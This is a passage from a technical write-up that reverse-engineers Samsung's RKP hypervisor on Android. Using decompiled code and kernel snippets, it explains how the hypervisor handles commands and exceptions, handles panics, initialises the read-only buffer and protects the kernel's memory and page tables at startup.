, is used to finalize the list of memory regions and initialize the dynamic heap allocator. S-Boot calls it once all physical memory regions have been added using the previous command. This function does multiple things (some details are still unclear to us):
PHYS_OFFSET
(physical address of kernel start);dynamic_regions
memlist;dynamic_heap_initialize
which like for the static heap, saves the values in global variables and initializes the list of heap chunks, similarly to the static heap allocator;physmap
, ro_bitmap
and dbl_bitmap
with the dynamic_regions
memlist;physmap
sparsemap to the protected_ranges
memlist;robuf_regions
and adds the dynamic heap region to it;robuf
with the robuf_regions
memlist;allocate_robuf
which we are going to detail below;regions
and 0xA00000000 (we don't know why it does that).int64_t allocate_robuf() {
// ...
if (!uh_state.dynamic_heap_inited) {
uh_log('L', "page_allocator.c", 84, "Dynamic heap needs to be initialized");
return -1;
}
robuf_size = uh_state.page_allocator.robuf_size & 0xFFFFF000;
robuf_base = dynamic_heap_alloc(uh_state.page_allocator.robuf_size & 0xFFFFF000, 0x1000);
if (!robuf_base)
dynamic_heap_alloc_last_chunk(&robuf_base, &robuf_size);
if (!robuf_base) {
uh_log('L', "page_allocator.c", 96, "Robuffer Alloc Fail");
return -1;
}
if (robuf_size) {
offset = 0;
do {
zero_data_cache_page(robuf_base + offset);
offset += 0x1000;
} while (offset < robuf_size);
}
return page_allocator_init(&uh_state.page_allocator, robuf_base, robuf_size);
}
allocate_robuf
tries to allocate a region of robuf_size
from the dynamic heap allocator that was initialized moments ago, and if that fails, it grabs the last contiguous chunk of memory available in the allocator. It then calls page_allocator_init
with this memory region as argument. page_allocator_init
initializes the sparsemap and everything that the page allocator will use. The page allocator/the "robuf" region, is what will be used by RKP for handing read-only pages to the kernel (for the data protection feature for example).
APP_RKP
The command handlers registered for APP_RKP
are:
Command ID | Command Handler | Maximum Calls |
---|---|---|
0x00 | rkp_cmd_init |
0 |
0x01 | rkp_cmd_start |
1 |
0x02 | rkp_cmd_deferred_start |
1 |
0x03 | rkp_cmd_write_pgt1 |
- |
0x04 | rkp_cmd_write_pgt2 |
- |
0x05 | rkp_cmd_write_pgt3 |
- |
0x06 | rkp_cmd_emult_ttbr0 |
- |
0x07 | rkp_cmd_emult_ttbr1 |
- |
0x08 | rkp_cmd_emult_doresume |
- |
0x09 | rkp_cmd_free_pgd |
- |
0x0A | rkp_cmd_new_pgd |
- |
0x0B | rkp_cmd_kaslr_mem |
0 |
0x0D | rkp_cmd_jopp_init |
1 |
0x0E | rkp_cmd_ropp_init |
1 |
0x0F | rkp_cmd_ropp_save |
0 |
0x10 | rkp_cmd_ropp_reload |
- |
0x11 | rkp_cmd_rkp_robuffer_alloc |
- |
0x12 | rkp_cmd_rkp_robuffer_free |
- |
0x13 | rkp_cmd_get_ro_bitmap |
1 |
0x14 | rkp_cmd_get_dbl_bitmap |
1 |
0x15 | rkp_cmd_get_rkp_get_buffer_bitmap |
1 |
0x17 | rkp_cmd_id_0x17 |
- |
0x18 | rkp_cmd_set_sctlr_el1 |
- |
0x19 | rkp_cmd_set_tcr_el1 |
- |
0x1A | rkp_cmd_set_contextidr_el1 |
- |
0x1B | rkp_cmd_id_0x1B |
- |
0x20 | rkp_cmd_dynamic_load |
- |
0x40 | rkp_cmd_cred_init |
1 |
0x41 | rkp_cmd_assign_ns_size |
1 |
0x42 | rkp_cmd_assign_cred_size |
1 |
0x43 | rkp_cmd_pgd_assign |
- |
0x44 | rkp_cmd_cred_set_fp |
- |
0x45 | rkp_cmd_cred_set_security |
- |
0x46 | rkp_cmd_assign_creds |
- |
0x48 | rkp_cmd_ro_free_pages |
- |
0x4A | rkp_cmd_prot_dble_map |
- |
0x4B | rkp_cmd_mark_ppt |
- |
0x4E | rkp_cmd_set_pages_ro_tsec_jar |
- |
0x4F | rkp_cmd_set_pages_ro_vfsmnt_jar |
- |
0x50 | rkp_cmd_set_pages_ro_cred_jar |
- |
0x51 | rkp_cmd_id_0x51 |
1 |
0x52 | rkp_cmd_init_ns |
- |
0x53 | rkp_cmd_ns_set_root_sb |
- |
0x54 | rkp_cmd_ns_set_flags |
- |
0x55 | rkp_cmd_ns_set_data |
- |
0x56 | rkp_cmd_ns_set_sys_vfsmnt |
5 |
0x57 | rkp_cmd_id_0x57 |
- |
0x60 | rkp_cmd_selinux_initialized |
- |
0x81 | rkp_cmd_test_get_par |
0 |
0x82 | rkp_cmd_test_get_wxn |
0 |
0x83 | rkp_cmd_test_ro_range |
0 |
0x84 | rkp_cmd_test_get_va_xn |
0 |
0x85 | rkp_check_vmm_unmapped |
0 |
0x86 | rkp_cmd_test_ro |
0 |
0x87 | rkp_cmd_id_0x87 |
0 |
0x88 | rkp_cmd_check_splintering_point |
0 |
0x89 | rkp_cmd_id_0x89 |
0 |
Let's take a look at command #0 called during startup by uH.
int64_t rkp_cmd_init() {
rkp_panic_on_violation = 1;
rkp_init_cmd_counts();
cs_init(&rkp_start_lock);
return 0;
}
The command #0 handler of APP_RKP
is also really simple. It set the maximal number of times a command can be called (enforced by the "checker" function) by calling rkp_init_cmd_counts
and initializes the critical section that will be used by the "start" and "deferred start" commands (more on that later).
An important part of a hypervisor is its exception handling code. These handling functions are going to be called on invalid memory accesses by the kernel, when the kernel executes an HVC instruction, etc. They can be found by looking at the vector table specified in the VBAR_EL2
register. We have seen in vmm_init
that the vector table is at vmm_vector_table
. From the ARMv8 specifications, it has the following structure:
Address | Exception Type | Description |
---|---|---|
+0x000 | Synchronous | Current EL with SP0 |
+0x080 | IRQ/vIRQ | |
+0x100 | FIQ/vFIQ | |
+0x180 | SError/vSError | |
+0x200 | Synchronous | Current EL with SPx |
+0x280 | IRQ/vIRQ | |
+0x300 | FIQ/vFIQ | |
+0x380 | SError/vSError | |
+0x400 | Synchronous | Lower EL using AArch64 |
+0x480 | IRQ/vIRQ | |
+0x500 | FIQ/vFIQ | |
+0x580 | SError/vSError | |
+0x600 | Synchronous | Lower EL using AArch32 |
+0x680 | IRQ/vIRQ | |
+0x700 | FIQ/vFIQ | |
+0x780 | SError/vSError |
Our device has a 64-bit kernel executing at EL1, so the commands dispatch will be in the exception handler at vmm_vector_table
+0x400, but all the handlers end up calling the same function anyway:
void exception_handler(...) {
// ...
// Save registers x0 to x30, sp_el1, elr_el2, spsr_el2
// ...
vmm_dispatch(<level>, <type>, ®s);
asm("clrex");
asm("eret");
}
vmm_dispatch
is given as arguments the level and type of the exception that has been taken.
int64_t vmm_dispatch(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
if (has_panicked)
vmm_panic(level, type, regs, "panic on another core");
switch (type) {
case 0x0:
if (vmm_synchronous_handler(level, type, regs))
vmm_panic(level, type, regs, "syncronous handler failed");
break;
case 0x80:
uh_log('D', "vmm.c", 1132, "RKP_e3b85960");
break;
case 0x100:
uh_log('D', "vmm.c", 1135, "RKP_6d732e0a");
break;
case 0x180:
uh_log('D', "vmm.c", 1149, "RKP_3c71de0a");
break;
default:
return 0;
}
return 0;
}
vmm_dispatch
, in the case of synchronous exception, will call vmm_synchronous_handler
.
int64_t vmm_synchronous_handler(int64_t level, int64_t type, saved_regs_t* regs) {
// ...
esr_el2 = get_esr_el2();
switch (esr_el2 >> 26) {
case 0x12: /* HVC instruction execution in AArch32 state */
case 0x16: /* HVC instruction execution in AArch64 state */
if ((regs->x0 & 0xFFFFF000) == 0xC300C000) {
cmd_id = regs->x1;
app_id = regs->x0;
cpu_num = get_current_cpu();
if (cpu_num <= 7)
uh_state.injections[cpu_num] = 0;
uh_handle_command(app_id, cmd_id, regs);
}
return 0;
case 0x18: /* Trapped MSR, MRS or Sys. ins. execution in AArch64 state */
if ((esr_el2 & 1) == 0 && !other_msr_mrs_system(®s->x0, esr_el2_1 & 0x1FFFFFF))
return 0;
vmm_panic(level, type, regs, "other_msr_mrs_system failure");
return 0;
case 0x20: /* Instruction Abort from a lower EL */
cs_enter(&s2_lock);
el1_va_to_ipa(get_elr_el2(), &ipa);
get_s2_1gb_page(ipa, &fld);
print_s2_fld(fld);
if ((fld & 3) == 3) {
get_s2_2mb_page(ipa, &sld);
print_s2_sld(sld);
if ((sld & 3) == 3) {
get_s2_4kb_page(ipa, &tld);
print_s2_tld(tld);
}
}
cs_exit(&s2_lock);
if (should_skip_prefetch_abort() == 1)
return 0;
if (!esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-")) {
print_vmm_registers(regs);
return 0;
}
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_from_a_lower_exception_level");
return 0;
case 0x21: /* Instruction Abort taken without a change in EL */
uh_log('L', "vmm.c", 920, "esr abort iss: 0x%x", esr_el2 & 0x1FFFFFF);
vmm_panic(level, type, regs, "esr_ec_prefetch_abort_taken_without_a_change_in_exception_level");
case 0x24: /* Data Abort from a lower EL */
if (!rkp_fault(regs))
return 0;
if ((esr_el2 & 0x3F) == 7) // Translation fault, level 3
{
va = rkp_get_va(get_hpfar_el2() << 8);
cs_enter(&s2_lock);
res = el1_va_to_pa(va, &ipa);
if (!res) {
uh_log('L', "vmm.c", 994, "Skipped data abort va: %p, ipa: %p", va, ipa);
cs_exit(&s2_lock);
return 0;
}
cs_exit(&s2_lock);
}
if ((esr_el2 & 0x7C) == 76) // Permission fault, any level
{
va = rkp_get_va(get_hpfar_el2() << 8);
at_s12e1w(va);
if ((get_par_el1() & 1) == 0) {
print_el2_state();
invalidate_entire_s1_s2_el1_tlb();
return 0;
}
}
el1_va_to_ipa(get_elr_el2(), &ipa);
get_s2_1gb_page(ipa, &fld);
print_s2_fld(fld);
if ((fld & 3) == 3) {
get_s2_2mb_page(ipa, &sld);
print_s2_sld(sld);
if ((sld & 3) == 3) {
get_s2_4kb_page(ipa, &tld);
print_s2_tld(tld);
}
}
if (esr_ec_prefetch_abort_from_a_lower_exception_level("-snip-"))
vmm_panic(level, type, regs, "esr_ec_data_abort_from_a_lower_exception_level");
else
print_vmm_registers(regs);
return 0;
case 0x25: /* Data Abort taken without a change in EL */
vmm_panic(level, type, regs, "esr_ec_data_abort_taken_without_a_change_in_exception_level");
return 0;
default:
return -1;
}
}
vmm_synchronous_handler
first get the exception class by reading the ESR_EL2
register.
uh_handle_command
function with the app_id
in X0 and cmd_id
in X1;other_msr_mrs_system
function with the register that was being written to;other_msr_mrs_system
gets the value that was being written from the saved registers;uh_panic
if the register is not allowed to be written to, or checks if the new value is valid (if specific bits have a fixed value);ELR_EL2
register to make it point to the next instruction.should_skip_prefetch_abort
;should_skip_prefetch_abort
returns 1, otherwise it return 0.esr_ec_prefetch_abort_from_a_lower_exception_level
;injections
array of uh_state
;rkp_fault
to detect RKP faults;str x2, [x1]
;rkp_l1pgt_write
;rkp_l2pgt_write
;rkp_l3pgt_write
.esr_ec_prefetch_abort_from_a_lower_exception_level
;crit_sec_t* vmm_panic(int64_t level, int64_t type, saved_regs_t* regs, char* message) {
// ...
uh_log('L', "vmm.c", 1171, ">>vmm_panic<<");
cs_enter(&panic_cs);
uh_log('L', "vmm.c", 1175, "message: %s", message);
switch (level) {
case 0x0:
uh_log('L', "vmm.c", 1179, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_EL0");
break;
case 0x200:
uh_log('L', "vmm.c", 1182, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_CURRENT_WITH_SP_ELX");
break;
case 0x400:
uh_log('L', "vmm.c", 1185, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH64");
break;
case 0x600:
uh_log('L', "vmm.c", 1188, "level: VMM_EXCEPTION_LEVEL_TAKEN_FROM_LOWER_USING_AARCH32");
break;
default:
uh_log('L', "vmm.c", 1191, "level: VMM_UNKNOWN\n");
break;
}
switch (type) {
case 0x0:
uh_log('L', "vmm.c", 1197, "type: VMM_EXCEPTION_TYPE_SYNCHRONOUS");
break;
case 0x80:
uh_log('L', "vmm.c", 1200, "type: VMM_EXCEPTION_TYPE_IRQ_OR_VIRQ");
break;
case 0x100:
uh_log('L', "vmm.c", 1203, "type: VMM_SYSCALL\n");
break;
case 0x180:
uh_log('L', "vmm.c", 1206, "type: VMM_EXCEPTION_TYPE_SERROR_OR_VSERROR");
break;
default:
uh_log('L', "vmm.c", 1209, "type: VMM_UNKNOWN\n");
break;
}
print_vmm_registers(regs);
if ((get_sctlr_el1() & 1) == 0 || type != 0 || (level == 0 || level == 0x200)) {
has_panicked = 1;
cs_exit(&panic_cs);
if (!strcmp(message, "panic on another core"))
exynos_reset(0x8800);
uh_panic();
}
uh_panic_el1(uh_state.fault_handler, regs);
return cs_exit(&panic_cs);
}
vmm_panic
logs the panic message, exception level and type, and if either
then it calls uh_panic
, otherwise it calls uh_panic_el1
.
void uh_panic() {
uh_log('L', "main.c", 482, "uh panic!");
print_state_and_reset();
}
void print_state_and_reset() {
uh_log('L', "panic.c", 29, "count state - page_ro: %lx, page_free: %lx, s2_breakdown: %lx", page_ro, page_free,
s2_breakdown);
print_el2_state();
print_el1_state();
print_stack_contents();
bigdata_store_data();
has_panicked = 1;
exynos_reset(0x8800);
}
uh_panic
logs the EL1 and EL2 system registers values, hypervisor and kernel stacks contents, copies a textual version of those into the "bigdata" region, and then reboots the device.
int64_t uh_panic_el1(uh_handler_list_t* fault_handler, saved_regs_t* regs) {
// ...
uh_log('L', "vmm.c", 111, ">>uh_panic_el1<<");
if (!fault_handler) {
uh_log('L', "vmm.c", 113, "uH handler did not registered");
uh_panic();
}
print_el2_state();
print_el1_state();
print_stack_contents();
cpu_num = get_current_cpu();
if (cpu_num <= 7) {
something = cpu_num - 0x21530000;
if (uh_state.injections[cpu_num] == something)
uh_log('D', "vmm.c", 99, "Injection locked");
uh_state.injections[cpu_num] = something;
}
handler_data = &fault_handler->uh_handler_data[cpu_num];
handler_data->esr_el2 = get_esr_el2();
handler_data->elr_el2 = get_elr_el2();
handler_data->hcr_el2 = get_hcr_el2();
handler_data->far_el2 = get_far_el2();
handler_data->hpfar_el2 = get_hpfar_el2() << 8;
if (regs)
memcpy(fault_handler->uh_handler_data[cpu_num].regs.regs, regs, 272);
set_elr_el2(fault_handler->uh_handler);
return 0;
}
uh_panic_el1
fills the structure that was specified in the command #0 of APP_INIT
that we have just seen. It also sets ELR_EL2
to the handler function so that it will be called upon executing the ERET
instruction.
RKP startup is performed in two stages using two different commands:
start_kernel
, right after mm_init
;kernel_init
, right before starting init
.On the kernel side, this command is called in rkp_init
, still in init/main.c
.
rkp_init_t rkp_init_data __rkp_ro = {
.magic = RKP_INIT_MAGIC,
.vmalloc_start = VMALLOC_START,
.no_fimc_verify = 0,
.fimc_phys_addr = 0,
._text = (u64)_text,
._etext = (u64)_etext,
._srodata = (u64)__start_rodata,
._erodata = (u64)__end_rodata,
.large_memory = 0,
};
static void __init rkp_init(void)
{
// ...
rkp_init_data.vmalloc_end = (u64)high_memory;
rkp_init_data.init_mm_pgd = (u64)__pa(swapper_pg_dir);
rkp_init_data.id_map_pgd = (u64)__pa(idmap_pg_dir);
rkp_init_data.tramp_pgd = (u64)__pa(tramp_pg_dir);
#ifdef CONFIG_UH_RKP_FIMC_CHECK
rkp_init_data.no_fimc_verify = 1;
#endif
rkp_init_data.tramp_valias = (u64)TRAMP_VALIAS;
rkp_init_data.zero_pg_addr = (u64)__pa(empty_zero_page);
// ...
uh_call(UH_APP_RKP, RKP_START, (u64)&rkp_init_data, (u64)kimage_voffset, 0, 0);
}
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_init();
// ...
}
On the hypervisor side, the command handler is as follows:
int64_t rkp_cmd_start(saved_regs_t* regs) {
// ...
cs_enter(&rkp_start_lock);
if (rkp_inited) {
cs_exit(&rkp_start_lock);
uh_log('L', "rkp.c", 133, "RKP is already started");
return -1;
}
res = rkp_start(regs);
cs_exit(&rkp_start_lock);
return res;
}
rkp_cmd_start
calls rkp_start
which does the real work.
int64_t rkp_start(saved_regs_t* regs) {
// ...
KIMAGE_VOFFSET = regs->x3;
rkp_init_data = rkp_get_pa(regs->x2);
if (rkp_init_data->magic - 0x5AFE0001 >= 2) {
uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
return -1;
}
if (rkp_init_data->magic == 0x5AFE0002) {
rkp_init_cmd_counts_test();
rkp_test = 1;
}
INIT_MM_PGD = rkp_init_data->init_mm_pgd;
ID_MAP_PGD = rkp_init_data->id_map_pgd;
ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
TRAMP_PGD = rkp_init_data->tramp_pgd;
TRAMP_VALIAS = rkp_init_data->tramp_valias;
VMALLOC_START = rkp_init_data->vmalloc_start;
VMALLOC_END = rkp_init_data->vmalloc_end;
TEXT = rkp_init_data->_text;
ETEXT = rkp_init_data->_etext;
TEXT_PA = rkp_get_pa(TEXT);
ETEXT_PA = rkp_get_pa(ETEXT);
SRODATA = rkp_init_data->_srodata;
ERODATA = rkp_init_data->_erodata;
TRAMP_PGD_PAGE = TRAMP_PGD & 0xFFFFFFFFF000;
INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xFFFFFFFFF000;
LARGE_MEMORY = rkp_init_data->large_memory;
page_ro = 0;
page_free = 0;
s2_breakdown = 0;
pmd_allocated_by_rkp = 0;
NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
if (rkp_bitmap_init() < 0) {
uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
return -1;
}
memlist_init(&executable_regions);
memlist_set_field_14(&executable_regions);
memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
if (TRAMP_VALIAS)
memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
memlist_init(&dynamic_load_regions);
memlist_set_field_14(&dynamic_load_regions);
put_last_dynamic_heap_chunk_in_static_heap();
if (rkp_paging_init() < 0) {
uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
return -1;
}
rkp_inited = 1;
if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xFFFFFFFFF000, 0, 1) < 0) {
uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
return -1;
}
uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
uh_log('L', "rkp_init.c", 186, "RKP Activated");
return 0;
}
Let's breakdown this function:
KIMAGE_VOFFSET
;rkp_init_data
from a virtual address to a physical address. It does so by calling the rkp_get_pa
function;magic
field. If it is the test mode magic, then it calls rkp_init_cmd_counts_test
which allows test commands 0x81-0x88 to be called an unlimited amount of times;rkp_init_data
into global variables;executable_regions
and adds the text section of the kernel to it, and does the same with the TRAMP_VALIAS
page if provided;dynamic_load_regions
which is used for the "dynamic executable loading" feature of RKP (more on that at the end of the blog post);put_last_dynamic_chunk_in_heap
(the end result on our device is that the static heap acquires all the unused dynamic memory and the dynamic heap doesn't have any memory left);rkp_paging_init
and rkp_l1pgt_process_table
that will we detail below;int64_t rkp_paging_init() {
// ...
if (!TEXT || (TEXT & 0xFFF) != 0) {
uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
return -1;
}
if (!ETEXT || (ETEXT & 0xFFF) != 0) {
uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
return -1;
}
if (TEXT_PA <= get_base() && ETEXT_PA > get_base())
return -1;
if (s2_unmap(0x87000000, 0x200000))
return -1;
if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
return -1;
}
if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
return -1;
}
if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA && s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
return -1;
}
rkp_phys_map_lock(ZERO_PG_ADDR);
if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
return -1;
}
rkp_phys_map_unlock(ZERO_PG_ADDR);
if (rkp_set_kernel_rox(0))
return -1;
if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
return -1;
}
if (!uh_state.dynamic_heap_inited)
return 0;
if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
return -1;
}
return 0;
}
Let's breakdown rkp_paging_init
as well:
TEXT
(name is our own) in the phys_map
;swapper_pg_dir
as RW in EL2 stage 1;empty_zero_page
ROX in EL1 stage 2;rkp_set_kernel_rox
that we will detail below;int64_t rkp_set_kernel_rox(int64_t access) {
// ...
erodata_pa = rkp_get_pa(ERODATA);
if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1, 1) < 0) {
uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
return -1;
}
if (access)
return 0;
if (((erodata_pa | ETEXT_PA) & 0xFFF) != 0) {
uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
return 0;
}
if (ETEXT_PA > erodata_pa) {
uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
return 0;
}
paddr = ETEXT_PA;
while (sparsemap_set_value_addr(&uh_state.ro_bitmap, addr, 1) >= 0) {
paddr += 0x1000;
if (paddr >= erodata_pa)
return 0;
uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
}
return 0;
}
rkp_set_kernel_rox
makes the range [kernel text start; rodata end] RWX (yes, RWX as the access argument is 0, but this function will be called again later with 0x80, making it RO) in the EL1 stage 2, then it updates ro_bitmap
to mark the range [kernel text end; rodata end] as RO in the ro_bitmap
sparsemap.
After rkp_paging_init
, rkp_start
calls rkp_l1pgt_process_table
to process the page tables (mainly about making the 3 levels of tables read-only). It calls this function on the value of TTBR0_EL1
register.
On the kernel side, this command is called in rkp_deferred_init
in include/linux/rkp.h
.
// from include/linux/rkp.h
static inline void rkp_deferred_init(void){
uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}
// from init/main.c
static int __ref kernel_init(void *unused)
{
// ...
rkp_deferred_init();
// ...
}
On the hypervisor side, the command handler is as follows:
int64_t rkp_cmd_deferred_start() {
return rkp_deferred_start();
}
int64_t rkp_deferred_start() {
uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
if (rkp_set_kernel_rox(0x80))
return -1;
if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1FFFFFF, 1) < 0) {
uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
return -1;
}
if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1FFFFFF, 1) < 0) {
uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
return -1;
}
rkp_deferred_inited = 1;
uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
memory_fini();
return 0;
}
rkp_cmd_deferred_start
and rkp_deferred_start
do the following:
rkp_set_kernel_rox
again (the first time was in the normal start) but this time with 0x80 (read-only) as an argument, so the kernel text + rodata gets marked as RO in stage 2;rkp_l1pgt_process_table
on swapper_pg_dir
;rkp_l1pgt_process_table
on tramp_pg_dir
(if set);memory_fini
.There are 3 more RKP commands there called by the kernel during startup.
Two of them are still in rkp_init
in init/main.c
:
// from init/main.c
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
static void __init rkp_init(void)
{
// ...
rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
// ...
}
// from include/linux/rkp.h
typedef struct sparse_bitmap_for_kernel {
u64 start_addr;
u64 end_addr;
u64 maxn;
char **map;
} sparse_bitmap_for_kernel_t;
static inline u8 rkp_is_pg_protected(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}
static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}
Let's take a look at the command handler for RKP_GET_RO_BITMAP
.
int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
// ...
if (rkp_deferred_inited)
return -1;
bitmap = dynamic_heap_alloc(0x20, 0);
if (!bitmap) {
uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
return -1;
}
memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
if (res) {
uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
return res;
}
regs->x0 = rkp_get_va(bitmap);
if (regs->x2)
*virt_to_phys_el1(regs->x2) = regs->x0;
uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
return 0;
}
rkp_cmd_get_ro_bitmap
allocates a sparse_bitmap_for_kernel_t
structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel
that will fill it with the information in ro_bitmap
. Then it puts its VA into X0, and if a pointer was provided in X2, it will also put it there (using virt_to_phys_el1
).
int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
// ...
if (!map || !kernel_bitmap)
return -1;
kernel_bitmap->start_addr = map->start_addr;
kernel_bitmap->end_addr = map->end_addr;
kernel_bitmap->maxn = map->count;
bitmaps = dynamic_heap_alloc(8 * map->count, 0);
if (!bitmaps) {
uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
return -1;
}
if (map->private) {
uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
return -1;
}
memset(bitmaps, 0, 8 * map->count);
kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xFFFFFFC000000000;
index = 0;
do {
bitmap = map->entries[index].bitmap;
if (bitmap)
bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xFFFFFFC000000000;
++index;
} while (index < kernel_bitmap->maxn);
return 0;
}
sparsemap_bitmap_kernel
takes a sparsemap and will convert all the bitmaps' physical addresses into virtual addresses before copying them into a sparse_bitmap_for_kernel_t
structure.
rkp_cmd_get_dbl_bitmap
is very similar to rkp_cmd_get_ro_bitmap
, but of course instead of sending the bitmaps of the ro_bitmap
, it sends those of dbl_bitmap
.
The third command, rkp_cmd_get_rkp_get_buffer_bitmap
, is also used to retrieve a sparsemap: page_allocator.map
. It is called by the kernel in rkp_robuffer_init
from init/main.c
.
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
static void __init rkp_robuffer_init(void)
{
rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}
asmlinkage __visible void __init start_kernel(void)
{
// ...
rkp_robuffer_init();
// ...
rkp_init();
// ...
}
// from include/linux/rkp.h
static inline unsigned int is_rkp_ro_page(u64 va){
return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}
To summarize, these bitmaps are used by the kernel to check if some data is protected by RKP (allocated on a read-only page), so that if that is the case, the kernel will need to call one of the RKP commands to modify it.
As a quick reminder, here is the Linux memory layout on Android (4KB pages + 3 levels):
Start End Size Use
-----------------------------------------------------------------------
0000000000000000 0000007fffffffff 512GB user
ffffff8000000000 ffffffffffffffff 512GB kernel
And here is the corresponding translation table lookup:
+--------+--------+--------+--------+--------+--------+--------+--------+
|63 56|55 48|47 40|39 32|31 24|23 16|15 8|7 0|
+--------+--------+--------+--------+--------+--------+--------+--------+
| | | | | |
| | | | | v
| | | | | [11:0] in-page offset
| | | | +-> [20:12] L3 index (PTE)
| | | +-----------> [29:21] L2 index (PMD)
| | +---------------------> [38:30] L1 index (PUD)
| +-------------------------------> [47:39] L0 index (PGD)
+-------------------------------------------------> [63] TTBR0/1
So keep in mind for this section that we have PGD = PUD = VA[38:30].
Here are the level 0, level 1 and level 2 descriptor formats:
And here is the level 3 descriptor format:
Processing of the first level tables in done by the rkp_l1pgt_process_table
function.
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
if (high_bits == 0x1FFFFFF) {
if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
return -1;
}
} else {
if (ID_MAP_PGD == pgd)
return 0;
}
rkp_phys_map_lock(pgd);
if (is_alloc) {
if (is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
if (high_bits)
type = KERNEL | L1;
else
type = L1;
res = rkp_phys_map_set(pgd, type);
if (res < 0) {
rkp_phys_map_unlock(pgd);
return res;
}
res = rkp_s2_page_change_permission(pgd, 0x80, 0, 0);
if (res < 0) {
